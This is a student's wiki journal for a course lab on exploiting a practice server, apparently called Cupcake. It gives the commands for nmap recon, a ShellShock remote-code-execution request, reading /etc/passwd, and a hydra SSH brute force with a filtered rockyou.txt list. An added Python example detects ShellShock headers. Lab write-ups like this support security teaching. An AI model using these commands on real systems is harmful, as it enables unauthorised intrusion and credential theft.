Activity 4.1 Exploiting Cupcake Technical Journal - Foren-Ken/tech-journal GitHub Wiki

Exploiting Cupcake (Server) required the following steps.

1. Recon

  • Service Version Detection: Using Nmap, it is possible to discover the services running on a host and the version of each service. nmap -sT --top-ports [number of common ports to select] -sV [host ip address]. The -sV flag enables service/version scanning and provides a deeper look into the services on a specific host.

The Nmap guide can be referenced for more options.

2. Developing a Knowledge Base

  • Utilizing nmaptocsv: This tool simply takes grepable output from nmap and adds delimiters to create a CSV file. nmaptocsv -i [input file] -d [delimiter choice (the divider between items in the CSV file)]. The output can be copied and pasted into any spreadsheet software, but ensure that the small clipboard icon is selected so the entries are split according to the delimiter.

The Nmap guide contains more on nmaptocsv.

3. Vulnerability Detection

  • This topic is highly dependent on research into the findings of the recon. In the case of Activity 4.1, we were given the vulnerability but this generosity is not expected for future assignments.

4. Remote Code Execution

  • ShellShock Vulnerability: This bug is used in the lab to send bash commands to the target. The request is made of three parts: a valid HTTP header, a legitimate (empty) function definition, and the bash command to be executed after it. curl -H 'Test: () { :; }; echo ; echo ; [location of command] [argument(s)]' bash -s :'' http://host/[Vulnerable Area]

The ShellShock Guide provides a more in-depth look at ShellShock.
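As an added example (not part of the original journal), a small detector for the ShellShock request signature described above, as a defender would run it over captured requests; the function names and sample requests are constructed for this illustration.

```python
import re

# A Shellshock request carries an HTTP header whose value starts with a bash
# function definition, "() {", followed by the command to run. A vulnerable CGI
# stack exports the header as an environment variable, and an unpatched bash
# keeps parsing past the function body and executes the trailing command.
# The detector below flags any header value that begins with that signature.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")

# Constructed sample requests: one ordinary, one carrying the signature.
SAMPLE_BENIGN = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: curl/7.68.0\r\n"
    "\r\n"
)
SAMPLE_SHELLSHOCK = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Test: () { :; }; echo ; echo ; /bin/id\r\n"
    "\r\n"
)


def parse_headers(raw_request: str) -> dict:
    """Split a raw HTTP request into its header name/value pairs."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:  # skip the request line
        if not line:                            # blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def find_shellshock_headers(raw_request: str) -> list:
    """Return (header, value) pairs whose value opens with a bash function definition."""
    return [(name, value) for name, value in parse_headers(raw_request).items()
            if SHELLSHOCK_RE.match(value)]


if __name__ == "__main__":
    for label, req in (("benign", SAMPLE_BENIGN), ("shellshock", SAMPLE_SHELLSHOCK)):
        print(label, find_shellshock_headers(req))
```

The regex also catches the spacing variants such as "(){" that appear in the wild; the real fix is patching bash on the host, since the web layer cannot sanitise every header that reaches a CGI handler.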

5. Developing a foothold

  • Password Generation: After gaining access using the remote code execution, I was able to use the command /bin/echo "$(< /etc/passwd)" to read the /etc/passwd file. This contains information on each account on the device, and the only normal-looking account is "Samwise". Using this information, rockyou.txt was filtered with the following command: cat rockyou.txt | grep -i "samwise" > potentialpass.txt
  • SSH Brute Force: With a list of potential passwords, the host, and the target account, it became simple to use the tool "hydra" to brute force a connection. This was done with the following command: hydra -l [account name] -P [password list] [target IP] -t 4 ssh

The Hydra Guide contains more information on hydra and its usage.

6. Gaining Root

  • This part was skipped in the lab and will be done in the future. Also, we don't have access to reset the server, so completing this step would destroy it for everyone else.